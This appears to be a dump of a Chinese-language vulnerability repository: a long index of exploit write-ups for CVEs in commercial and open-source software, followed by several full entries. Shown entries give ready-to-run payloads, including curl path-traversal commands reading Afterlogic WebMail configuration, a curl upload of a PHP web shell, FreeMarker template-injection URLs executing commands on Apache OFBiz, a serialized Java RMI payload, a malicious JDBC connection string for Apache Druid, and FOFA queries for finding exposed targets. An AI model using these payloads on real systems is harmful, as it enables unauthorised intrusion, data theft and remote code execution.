├── Adminer SSRF(CVE-2021-21311).md
├── Adobe ColdFusion 远程代码执行漏洞(CVE-2021-21087).md
├── Afterlogic Aurora & WebMail Pro 任意文件读取(CVE-2021-26294).md
├── Afterlogic Aurora & WebMail Pro 文件上传漏洞(CVE-2021-26293).md
├── Anchor CMS 0.12.7 跨站请求伪造(CVE-2020-23342).md
├── Apache Druid 远程代码执行漏洞(CVE-2021-25646).md
├── Apache Druid 远程代码执行漏洞(CVE-2021-26919).md
├── Apache Kylin API未授权访问漏洞(CVE-2020-13937).md
├── Apache NiFi Api 远程代码执行(RCE).md
├── Apache OFBiz RMI Bypass RCE(CVE-2021-29200).md
├── Apache OFBiz RMI反序列化任意代码执行(CVE-2021-26295).md
├── Apache OFBiz 反序列化(CVE-2021-30128).md
├── Apache OfBiz 服务器端模板注入(SSTI).md
├── Apache OfBiz 远程代码执行(RCE).md
├── Apache Shiro < 1.7.1 权限绕过漏洞(CVE-2020-17523).md
├── Apache Solr Replication handler SSRF(CVE-2021-27905).md
├── Apache Solr stream.url任意文件读取漏洞.md
├── Apache Solr<= 8.8.2 (最新) 任意文件删除.md
├── Apache Velocity 远程代码执行 (CVE-2020-13936).md
├── Appspace 6.2.4 SSRF (CVE-2021-27670).md
├── BIG-IP 缓冲区溢出漏洞 (CVE-2021-22991).md
├── BIG-IP- BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986).md
├── BloofoxCMS 0.5.2.1 存储型XSS.md
├── Bypass for Microsoft Exchange远程代码执行 CVE-2020-16875.md
├── C-Lodop打印机任意文件读取漏洞.md
├── CISCO ASA任意文件读取漏洞 (CVE-2020-3452).md
├── CNVD-2020-24741 JunAms内容管理系统文件上传漏洞.md
├── CNVD-C-2020-121325 禅道开源版文件上传漏洞.md
├── CVE-2019-12384 jackson ssrf-rce(附exp脚本).md
├── CVE-2020-10148 SolarWinds Orion API 远程代码执行漏洞.md
├── CVE-2020-10977 Gitlab任意文件读取导致远程命令执行.md
├── CVE-2020-13935 Apache Tomcat WebSocket 拒绝服务漏洞.md
├── CVE-2020-13942 Apache Unomi 远程代码执行.md
├── CVE-2020-14815 Oracle Business Intelligence XSS.md
├── CVE-2020-16846 SaltStack远程执行代码漏洞.md
├── CVE-2020-16898 | Windows TCP-IP远程执行代码漏洞 Exploit.md
├── CVE-2020-17083 Microsoft Exchange Server 远程执行代码漏洞.md
├── CVE-2020-17143 Microsoft Exchange 信息泄露漏洞 PoC.md
├── CVE-2020-17144 Exchange2010 反序列化RCE.md
├── CVE-2020-17518 Apache Flink 任意文件写入.md
├── CVE-2020-17519 Apache Flink 任意文件读取.md
├── CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞.md
├── CVE-2020-26238 Cron-Utils 远程代码执行(RCE)漏洞.md
├── CVE-2020-26258 XStream SSRF.md
├── CVE-2020-26259 XStream 任意文件删除.md
├── CVE-2020-26935 phpmyadmin后台SQL注入.md
├── CVE-2020-27131 Cisco Security Manager 反序列化RCE.md
├── CVE-2020-27533 DedeCMS v.5.8搜索功能 "keyword"参数XSS漏洞 PoC.md
├── CVE-2020-27986 SonarQube api 未授权访问.md
├── CVE-2020-29133 Coremail 存储型XSS.md
├── CVE-2020-29564 Consul Docker images 空密码登录漏洞.md
├── CVE-2020-35476 OpenTSDB 2.4.0 远程代码执行.md
├── CVE-2020-36179〜82 Jackson-databind SSRF&RCE.md
├── CVE-2020-6019 Valve Game Networking Sockets 安全漏洞.md
├── CVE-2020-6308 SAP POC.md
├── CVE-2020-8209 XenMobile(Citrix Endpoint Management) 目录遍历漏洞.md
├── CVE-2020-8255 Pulse Connect Secure通过登录消息组件实现任意文件读取.md
├── CVE-2020-8277:Node.js通过DNS请求实现拒绝服务.md
├── CVE-2020–14882 Weblogic 未经授权绕过RCE.md
├── CVE-2020–24723 存储XSS的故事导致管理帐户接管.md
├── CVE-2020–4280 — IBM QRadar Java反序列化分析和绕过.md
├── CVE-2021-1791 Fairplay OOB Read POC.md
├── CVE-2021-3007 zend framework3 反序列化 rce.md
├── CVE-2021-3156 (Baron Samedit) Sudo 中基于堆的缓冲区溢出漏洞.md
├── Cacti SQL 注入漏洞(CVE-2020-14295).md
├── Chrome 插件 Vue.js devtools UXSS.md
├── Chrome 远程代码执行漏洞 1Day(CVE-2021-21220).md
├── Cisco HyperFlex HX 任意文件上传(CVE-2021-1499).md
├── Cisco HyperFlex HX 命令注入(CVE-2021-1497-CVE-2021-1498).md
├── CloudBees Jenkins和LTS 跨站脚本漏洞 CVE-2020-2229.md
├── Coremail论客邮件系统路径遍历与文件上传漏洞.md
├── D-LINK DIR-802 命令注入漏洞(CVE-2021-29379).md
├── D-LINK DIR-841 命令注入(CVE-2021-28143).md
├── D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506).md
├── D-Link DAP-2020远程代码执行 (CVE-2021-27249-2021-27250).md
├── D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078.md
├── D-Link DIR-846路由器 命令注入 (CVE-2020-27600).md
├── D-Link DSR-250 DSR-1000N 命令注入(CVE-2020-18568).md
├── D-link DSL-2888A 未授权访问漏洞 (CVE-2020-24579).md
├── D-link DSL-2888A 远程代码执行漏洞 (CVE-2020-24581).md
├── DD-WRT 缓冲区溢出漏洞(CVE-2021-27137).md
├── DNS Server远程代码执行漏洞(CVE-2020-1350).md
├── DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685).md
├── Dell BIOS驱动权限提升漏洞(CVE-2021-21551).md
├── Dell OpenManage Server Administrator 任意文件读取 (CVE-2021-21514).md
├── Discuz 3.4 最新版后台getshell.md
├── Docker 容器逃逸漏洞(CVE-2020-15257).md
├── ERPNext 13.0.0-12.18.0 中的SQL注入漏洞.md
├── ERPNext 13.0.0-12.18.0 中的多个XSS漏洞.md
├── Eclipse Jetty 拒绝服务 (CVE-2020-27223).md
├── Eclipse Theia < 0.16.0 Javascript注入 (CVE-2021-28162).md
├── Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737).md
├── Emlog v6.0.0 ZIP插件GETSHELL(CVE-2020-21585).md
├── ExifTool 任意代码执行漏洞 (CVE-2021-22204).md
├── FastAdmin 框架远程代码执行漏洞.md
├── FortiLogger-未经身份验证的任意文件上传(CVE-2021-3378).md
├── Fuel CMS 1.4.1 远程代码执行.md
├── Git <= 2.29.2 Git-LFS-RCE-Exploit-CVE-2020-27955.md
├── Git CLI远程代码执行漏洞(CVE-2020-26233).md
├── Git LFS 远程代码执行漏洞 CVE-2020–27955.md
├── GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413).md
├── Gitlab Kramdown RCE(CVE-2021-22192).md
├── Gitlab SSRF-信息泄漏漏洞 (CVE-2021-22178-CVE-2021-22176).md
├── Gitlab 敏感信息泄露漏洞 (CVE-2021-22188).md
├── Gogs Git Hooks 远程代码执行漏洞(CVE-2020-15867).md
├── GravCMS未经身份验证的任意YAML写入-RCE(CVE-2021-21425).md
├── H3C-SecPath-运维审计系统(堡垒机)任意用户登录.md
├── HTTP协议栈远程代码执行漏洞(CVE-2021-31166).md
├── IBM Maximo Asset Management XXE漏洞(CVE-2020-4463).md
├── IBOS酷办公系统 后台命令执行.md
├── IE 脚本引擎 jscript9.dll 内存损坏漏洞(CVE-2021-26419).md
├── Infinite WP管理面板中的身份验证绕过和RCE(CVE-2020-28642).md
├── Internet Explorer内存损坏漏洞(CVE-2021-26411).md
├── Ivanti Avalanche 目录遍历漏洞.md
├── JD-FreeFuck 后台命令执行漏洞.md
├── JEEWMS 未授权任意文件读取漏洞.md
├── Jackson-databind RCE(CVE-2020-35728).md
├── Jellyfin 任意文件读取(CVE-2021-21402).md
├── Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616).md
├── Joomla com_media 后台 RCE (CVE-2021-23132).md
├── JumpServer远程执行漏洞.md
├── KEADCOM 数字系统接入网关任意文件读取漏洞.md
├── Kubernetes 准入机制绕过(CVE-2021-25735).md
├── Laravel <= V8.4.2 Debug模式远程代码执行漏洞(CVE-2021-3129).md
├── LightCMS 存储型XSS(CVE-2021-3355).md
├── Linksys WRT160NL 身份验证命令注入(CVE-2021-25310).md
├── Mark Text Markdown 编辑器RCE(CVE-2021-29996).md
├── Maxum Rumpus 命令注入漏洞(CVE-2020-27575).md
├── MediaWiki <1.3.1.2 跨站脚本攻击(XSS)(CVE-2021-30157).md
├── MessageSolution 企业邮件归档管理系统任意文件上传(CNVD-2021-10543).md
├── MessageSolution 企业邮件归档管理系统信息泄露漏洞 CNVD-2021-10543.md
├── Microsoft Edge浏览器 45.9.5地址栏欺骗POC.md
├── Microsoft Exchange SSRF(CVE-2021-26855).md
├── Microsoft Exchange Server远程执行代码漏洞(CVE-2021-28482).md
├── Microsoft Graphics Components 代码执行漏洞 (CVE-2021-24093).md
├── Microsoft Windows 10 蓝屏死机漏洞.md
├── Microsoft Windows NTFS磁盘损坏漏洞.md
├── Microsoft Windows10 本地提权漏洞(CVE-2021-1732).md
├── MinIO未授权SSRF漏洞(CVE-2021-21287).md
├── MyBB sql注入导致的远程代码执行 (CVE-2021-27890).md
├── NETGEAR R7000 缓冲区溢出漏洞(CVE-2021-31802).md
├── NPM VSCode扩展中的RCE(CVE-2021-26700).md
├── Nacos Bypass身份验证.md
├── Nagios Network Analyzer SQL 注入漏洞(CVE-2021-28925).md
├── Nagios XI 5.7.X 远程代码执行.md
├── Nagios 代码注入漏洞 (CVE-2021-3273).md
├── Netgear JGS516PE-GS116Ev2 交换机中多个高危漏洞.md
├── Nexus Repository Manager 3 XML外部实体注入(CVE-2020-29436).md
├── Node.js命令注入漏洞(CVE-2021-21315).md
├── Nokia G-120W-F 路由器存储型XSS(CVE-2021-30003).md
├── OneBlog开源博客管理系统 远程命令执行.md
├── OneDev 多个高危漏洞 (CVE-2021-21242~51).md
├── Open5GS 默认密码漏洞 (CVE-2021-25863).md
├── OpenCMS 11.0.2 文件上传到命令执行.md
├── OpenSSL 拒绝服务漏洞(CVE-2021-3449).md
├── PEGA pega infinity 授权认证绕过RCE(CVE-2021-27651).md
├── PHP Composer命令注入漏洞(CVE-2021-29472).md
├── PHP图像处理组件:Intervention-image 目录遍历漏洞.md
├── Packer-Fuzzer 漏扫工具 < 1.2 远程代码执行漏洞.md
├── Palo Alto PAN-OS 防火墙多个漏洞.md
├── Panabit 智能应用网关 后台命令执行漏洞.md
├── Pydio 网盘系统 RCE (CVE-2020-28913).md
├── QNAP QTS Surveillance Station插件远程代码执行漏洞(CVE-2021-28797).md
├── RDoc 命令注入(CVE-2021-31799).md
├── README.md
├── Ruby目录遍历漏洞(CVE-2021-28966).md
├── SAP_EEM_CVE-2020-6207 PoC.md
├── SaltStack命令注入漏洞(CVE-2021-31607).md
├── Saltstack 未授权RCE漏洞 (CVE-2021-25281-25282-25283).md
├── SeaCMS SQL注入漏洞(CVE-2020-21378).md
├── ShopXO 任意文件读取漏洞(CNVD-2021-15822).md
├── ShowDoc 前台文件上传漏洞.md
├── SonicWall SSL-VPN 未授权RCE漏洞.md
├── Steam远程代码执行漏洞(CVE-2021-30481).md
├── Struts2 s2-061 Poc (CVE-2020-17530).md
├── TG8 防火墙中的 RCE 和密码泄漏.md
├── TP-Link AC1750 预认证远程代码执行漏洞(CVE-2021-27246).md
├── TP-Link TL-WR841N远程代码执行漏洞(CVE-2020-35576).md
├── TP-Link WR2041 v1拒绝服务漏洞(CVE-2021-26827).md
├── TP-link 栈溢出漏洞(CVE-2021-29302).md
├── TVT数码科技 NVMS-1000 路径遍历漏洞.md
├── TerraMaster TOS 未授权 RCE (CVE-2020-28188).md
├── Thymeleaf 3.0.12 RCE Bypass.md
├── Typora 0.9.67 XSS到RCE(CVE-2020-18737).md
├── UCMS文件上传漏洞(CVE-2020-25483).md
├── Ubuntu OverlayFS 权限提升漏洞(CVE-2021-3493).md
├── VMware View Planner 未授权RCE (CVE-2021-21978).md
├── VMware Workspace ONE Access 命令注入漏洞(CVE-2020-4006).md
├── VMware vCenter Server 服务器端请求伪造漏洞 (CVE-2021-21973).md
├── VMware vCenter Server 远程执行代码漏洞 (CVE-2021-21972).md
├── VMware vCenter 未经身份验证任意文件读取漏洞 < 6.5u1.md
├── VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975).md
├── VoIPmonitor UnAuth RCE(CVE-2021-30461).md
├── Wazuh Manager 代码执行漏洞(CVE-2021-26814).md
├── WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294).md
├── Weblogic Server远程代码执行漏洞 (CVE-2021-2109).md
├── Weblogic Server远程代码执行漏洞(CVE-2020-14756).md
├── Webmin <=1.962 任意命令执行(CVE-2020-35606).md
├── Webmin 多个高危漏洞(CVE-2021-31760~62).md
├── Windows Install(WMI)越权漏洞(CVE-2020-0683).md
├── Windows Installer File Read 0day.md
├── Windows TCP-IP拒绝服务漏洞 (CVE-2021-24086).md
├── Windows容器管理器服务提升权限漏洞(CVE-2021-31169).md
├── WordPress 5.6-5.7-经过身份验证的XXE(CVE-2021-29447).md
├── WordPress Elementor Page Builder Plus插件身份验证绕过(CVE-2021-24175).md
├── WordPress File Manager < 6.9 RCE(CVE-2020-25213)PoC.md
├── WordPress GiveWP 2.9.7 反射型XSS(CVE-2021-24213).md
├── WordPress WP Super Cache 插件 < 1.7.2 RCE(CVE-2021-24209).md
├── WordPress 插件SuperForms 4.9-任意文件上传到远程代码执行.md
├── WordPress插件Tutor LMS SQL注入漏洞(CVE-2021-24186).md
├── XStream 1.4.16 多个RCE(CVE-2021-21344~50).md
├── Xmind 2020 XSS漏洞导致命令执行.md
├── YouPHPTube <= 10.0 and 7.8 多个漏洞 SQL注入、XSS、文件写入.md
├── Zen Cart 1.5.7b 任意命令执行(CVE-2021-3291).md
├── Zoho 任意文件上传漏洞(CVE-2020-8394).md
├── Zyxel NBG2105 身份验证绕过(CVE-2021-3297).md
├── Zyxel USG Series 账户硬编码漏洞(CVE-2020-29583).md
├── arpping 2.0.0 远程代码执行(RCE).md
├── cve-2020-14882-weblogic越权绕过登录RCE批量检测.md
├── images
├── 16106764876967.jpg
├── 16106765066847.jpg
├── 16107164481030.jpg
├── 16111463128724.jpg
├── 16113243229970.jpg
├── 16113243347850.jpg
├── 16113243420968.jpg
├── 16115656107779.jpg
├── 16115656542559.jpg
├── 16115656597330.jpg
├── 16116291613423.jpg
├── 16116664946838.jpg
├── 16116665275577.jpg
├── 16116665373943.jpg
├── 16120234683238.jpg
├── 16122559201818.jpg
├── 16133783853910.jpg
├── 16133785780018.jpg
├── 16133786592286.jpg
├── 16133787776790.jpg
├── 16133787994051.jpg
├── 16133789299379.jpg
├── 16142224147525.jpg
├── 16158583105399.jpg
├── 16158583337487.jpg
├── 16158593231899.jpg
├── 16158605326396.jpg
├── README.md
├── SamsungWLANAP.png
└── logo.jpeg
├── jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md
├── jinja服务端模板注入漏洞.md
├── lanproxy 目录遍历漏洞(CVE-2020-3019).md
├── media
├── 16215832926594
│ └── 16215833292331.jpg
├── 16215838843080
│ └── 16215839880736.jpg
├── 16215843577504
│ └── 16215844065112.jpg
├── 16215847478584
│ └── 16215847933888.jpg
├── 16215855485022
│ └── 16215855715459.jpg
├── 16215868078702
│ └── 16215868539351.jpg
├── 16215873291906
│ └── 16215873565851.jpg
└── 16215889743656
│ └── 16215890003872.jpg
├── nagios-xi-5.7.5 多个漏洞(CVE-2021-25296~99).md
├── rConfig 3.9.6 远程 Shell Upload.md
├── xxl-job 执行器 RESTful API 未授权访问 RCE.md
├── yycms首页搜索框 XSS漏洞.md
├── zzzcms 远程代码执行漏洞(CVE-2021-32605).md
├── 三星路由器WLAN AP WEA453e 未授权RCE等多个漏洞.md
├── 中新金盾信息安全管理系统 默认密码漏洞.md
├── 云尚在线客服系统任意文件上传.md
├── 亿邮邮件系统远程命令执行漏洞 (CNVD-2021-26422).md
├── 会捷通云视讯 敏感信息泄漏.md
├── 佑友防火墙 后台RCE-默认口令.md
├── 华硕-GT-AC2900-身份验证绕过(CVE-2021-32030).md
├── 员工管理系统(Employee Management System)1.0 身份验证绕过.md
├── 和信创天云桌面系统命令执行,文件上传 全版本 RCE.md
├── 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793.md
├── 奇安信NS-NGFW 网康下一代防火墙 前台RCE.md
├── 奇安信天擎 越权访问.md
├── 孚盟云 CRM系统多个高危漏洞.md
├── 安天高级可持续威胁安全检测系统 越权访问漏洞.md
├── 宏电 H8922 路由器中多个漏洞(CVE-2021-28149~52).md
├── 帆软 V9未授权RCE漏洞.md
├── 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757.md
├── 微信客户端远程命令执行漏洞.md
├── 思福迪堡垒机(Logbase)任意用户登录-默认口令.md
├── 日产聆风电动汽车(Leaf EV) 2018款本地拒绝服务漏洞.md
├── 智慧校园管理系统 前台任意文件上传.md
├── 朗视TG400 GSM 网关目录遍历 (CVE-2021-27328).md
├── 泛微 OA 前台 GetShell 复现.md
├── 泛微OA E-cology WorkflowServiceXml 远程代码执行漏洞.md
├── 泛微e-cology任意文件上传.md
├── 浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224).md
├── 海康威视 流媒体管理服务器任意文件读取-通用弱口令 CNVD-2021-14544.md
├── 爱快(iKuai) 后台任意文件读取(0day).md
├── 狮子鱼社区团购系统 wxapp.php 文件上传漏洞.md
├── 用友 NCCloud FS文件管理SQL注入.md
├── 用友 U8 OA test.jsp SQL注入漏洞.md
├── 用友NC 6.5 反序列化命令执行.md
├── 用友nc 6.5 文件上传 PoC.md
├── 碧海威科技 L7 多款产品 后台命令执行.md
├── 网康 NS-ASG安全网关 任意文件读取漏洞.md
├── 腾达路由器 AC11 堆栈缓冲区溢出(CVE-2021-31758).md
├── 腾达路由器 D151-D31未经身份验证的配置下载.md
├── 致远OA A8-V5 任意文件读取.md
├── 若依(RuoYi)管理系统 后台任意文件读取.md
├── 蓝凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363.md
├── 蓝凌OA custom.jsp 任意文件读取漏洞.md
├── 蓝凌OA 前台 SSRF 到 RCE.md
├── 蓝海卓越计费管理系统 任意文件读取漏洞.md
├── 通达OA11.7 任意用户登陆.md
├── 通达OA11.7 未授权RCE.md
├── 通达OA11.9 低权限SQL注入漏洞.md
├── 金和OA C6 后台越权敏感文件遍历漏洞.md
├── 金山 V8 终端安全系统 pdf_maker.php 未授权 RCE.md
├── 金山 V8 终端安全系统 任意文件读取漏洞.md
├── 金山终端安全系统 V8-V9存在文件上传漏洞.md
├── 银澎云计算 好视通视频会议系统 任意文件下载.md
├── 锐捷 EG 易网关RCE 0day.md
├── 锐捷-EWEB网管系统RCE.md
├── 锐捷RG-UAC 账户硬编码漏洞.md
├── 锐捷SSL VPN 越权访问漏洞.md
├── 锐捷Smartweb管理系统 密码信息泄露 CNVD-2021-17369.md
├── 阿里巴巴otter manager分布式数据库同步系统信息泄漏-默认口令(CNVD-2021-16592).md
├── 飞鱼星 家用智能路由 cookie.cgi 权限绕过.md
├── 默安幻阵蜜罐安装平台未授权访问.md
└── 齐治堡垒机任意用户登陆.md
/Adobe ColdFusion 远程代码执行漏洞(CVE-2021-21087).md:
--------------------------------------------------------------------------------
1 | # Adobe ColdFusion 远程代码执行漏洞(CVE-2021-21087)
2 |
3 | Adobe ColdFusion是一个快速应用程序开发平台。。Adobe ColdFusion 存在远程代码执行漏洞,由于过滤不严,未经授权的攻击者可构造恶意请求,造成任意代码执行,控制服务器。建议相关用户尽快采取安全措施阻止漏洞攻击。
4 |
5 | 影响范围
6 |
7 | * Adobe ColdFusion 2021 <= Version 2021.0.0.323925
8 | * Adobe ColdFusion 2018 <= Update 10
9 | * Adobe ColdFusion 2016 <= Update 16
10 |
11 | FOFA:
12 |
13 | ```
14 | app="Adobe-ColdFusion"
15 | ```
16 |
17 | PoC:
18 |
19 | ```
20 | - method: GET
21 | path:
22 | - "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
23 | - "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
24 | - "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
25 | - "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
26 | - "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
27 | - "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
28 | - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
29 |
30 | regex:
31 | - 'eval\(\"\(\"\+json\+\"\)\"\)'
32 | ```
33 |
34 | ref:
35 |
36 | * https://nosec.org/home/detail/4707.html
37 | * https://github.com/projectdiscovery/nuclei-templates/pull/1128/files
38 | * https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
--------------------------------------------------------------------------------
/Afterlogic Aurora & WebMail Pro 任意文件读取(CVE-2021-26294).md:
--------------------------------------------------------------------------------
1 | # Afterlogic Aurora & WebMail Pro 任意文件读取(CVE-2021-26294)
2 |
3 | 攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
4 |
5 | 影响版本:
6 |
7 | * WebMail Pro ≤ 7.7.9
8 | * Afterlogic Aurora ≤ 7.7.9
9 |
10 | PoC:
11 |
12 |
13 | ```bash
14 | curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
15 | ```
16 |
17 | ref:
18 |
19 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
20 | * https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
21 | * https://forum.ywhack.com/thread-115326-1-8.html
--------------------------------------------------------------------------------
/Afterlogic Aurora & WebMail Pro 文件上传漏洞(CVE-2021-26293).md:
--------------------------------------------------------------------------------
1 | # Afterlogic Aurora & WebMail Pro 文件上传漏洞(CVE-2021-26293)
2 |
3 | 该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷,攻击者可以通过上传恶意文件,从而执行任意代码。
4 |
5 | 影响版本:
6 |
7 | * WebMail Pro ≤ 7.7.9
8 | * Afterlogic Aurora ≤ 7.7.9
9 |
10 | **PoC:**
11 |
12 | ```bash
13 | curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
14 | ```
15 |
16 | 默认路径为/var/www/html,也可能更改配置为其它路径,可以尝试其它方式获取。
17 |
18 |
19 | ```bash
20 | curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
21 | //使用无效路径获取SabreDAV错误查看Webroot路径
22 | ```
23 |
24 | ref:
25 |
26 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
27 | * https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
28 | * https://forum.ywhack.com/thread-115325-1-8.html
--------------------------------------------------------------------------------
/Anchor CMS 0.12.7 跨站请求伪造(CVE-2020-23342).md:
--------------------------------------------------------------------------------
1 | # Anchor CMS 0.12.7 跨站请求伪造(CVE-2020-23342)
2 |
3 | FOFA:
4 |
5 | ```
6 | "Anchor CMS" && body="themes/default/img/favicon.png"
7 | ```
8 |
9 | **PoC:**
10 |
11 | Anchor CMS使用Get方法进行敏感操作,可以使用exploit.html进行删除用户等操作。
12 |
13 | **exploit.html:**
14 |
15 | ```html
16 |
17 | ```
18 |
19 | 当管理员点击时删除ID为21的用户。
20 |
21 | ref:
22 |
23 | https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
--------------------------------------------------------------------------------
/Apache Druid 远程代码执行漏洞(CVE-2021-26919).md:
--------------------------------------------------------------------------------
1 | # Apache Druid 远程代码执行漏洞(CVE-2021-26919)
2 |
3 | Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。2021年3月30日,Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。
4 |
5 | 影响版本
6 |
7 | Apache Druid < 0.20.2
8 |
9 | jdbc触发点:https://druid.apache.org/docs/0.19.0/development/extensions-core/druid-lookups.html#polling-lookup
10 |
11 | poc:
12 |
13 | ```
14 | url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535"
15 | user ="cb1"
16 | password="password"
17 | ```
18 |
19 | ref:
20 |
21 | * http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
22 | * https://help.aliyun.com/noticelist/articleid/1060822985.html
--------------------------------------------------------------------------------
/Apache Kylin API未授权访问漏洞(CVE-2020-13937).md:
--------------------------------------------------------------------------------
1 | # Apache Kylin API未授权访问漏洞(CVE-2020-13937)
2 |
3 |
4 | fofa:title="Kylin"
5 |
6 | 预警通告:https://help.aliyun.com/noticelist/articleid/1060733129.html
7 |
8 | PoC:
9 |
10 | ```
11 | http://xx.com/kylin/api/admin/config
12 | ```
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/Apache OFBiz RMI Bypass RCE(CVE-2021-29200).md:
--------------------------------------------------------------------------------
1 | # Apache OFBiz RMI Bypass RCE(CVE-2021-29200)
2 |
3 |
4 | 由于Apache OFBiz存在Java RMI反序列化漏洞,未经身份验证的用户可以执行RCE攻击,导致服务器被接管。
5 |
6 | 影响版本:
7 | Apache OFBiz < 17.12.07
8 |
9 | 详细分析可以见:https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
10 |
11 | poc:
12 |
13 | ```
14 | POST /webtools/control/SOAPService HTTP/1.1
15 | Host: xxx
16 | User-Agent: python-requests/2.24.0
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: close
20 | Content-Type: text/xml
21 | Content-Length: 877
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 | ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | ```
42 |
43 | poc.py:https://github.com/r0ckysec/CVE-2021-29200
44 |
45 | ref:
46 |
47 | * https://github.com/r0ckysec/CVE-2021-29200
48 | * https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
49 | * https://xz.aliyun.com/t/9556
50 |
--------------------------------------------------------------------------------
/Apache OfBiz 服务器端模板注入(SSTI).md:
--------------------------------------------------------------------------------
1 | # Apache OfBiz 服务器端模板注入(SSTI)
2 |
3 |
4 | Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。
5 |
6 | FOFA:
7 |
8 | ```
9 | app="Apache_OFBiz"
10 | ```
11 |
12 | 服务器端模板注入 renderLookupField
13 |
14 | 从不可信数据流request.getParameter("`_LAST_VIEW_NAME_`")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
15 |
16 | **PoC:**
17 |
18 | ```
19 | https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
20 | ```
21 |
22 | from:https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
--------------------------------------------------------------------------------
/Apache OfBiz 远程代码执行(RCE).md:
--------------------------------------------------------------------------------
1 | # Apache OfBiz 远程代码执行(RCE)
2 |
3 | Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。
4 |
5 | FOFA:
6 |
7 | ```
8 | app="Apache_OFBiz"
9 | ```
10 |
11 | PoC:
12 |
13 | ```
14 | https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")} https://help.aliyun.com/noticelist/articleid/1060799995.html
21 | > https://www.anquanke.com/post/id/230935
--------------------------------------------------------------------------------
/Apache Solr Replication handler SSRF(CVE-2021-27905).md:
--------------------------------------------------------------------------------
1 | # Apache Solr Replication handler SSRF(CVE-2021-27905)
2 |
3 |
